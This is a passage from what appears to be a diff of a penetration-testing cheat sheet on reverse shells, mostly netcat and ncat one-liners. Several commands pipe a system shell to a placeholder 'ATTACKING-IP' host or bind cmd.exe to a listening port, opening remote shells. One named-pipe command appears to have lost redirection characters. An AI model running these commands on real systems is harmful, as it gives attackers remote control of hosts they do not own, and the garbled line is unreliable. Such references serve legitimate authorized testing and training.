xapax/security/reverse-shell.md

 /bin/sh | nc ATTACKING-IP 80
 ```

+**Without -e flag**

 ```
 rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
 ```

 ### Ncat

 Ncat is a better and more modern version of netcat.
 One feature it has that netcat does not have is encryption.
 If you are on a pentestjob you might not want to communicate unencrypted.

 Bind

 ```
 ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
 ncat -v 192.168.1.103 5555 --ssl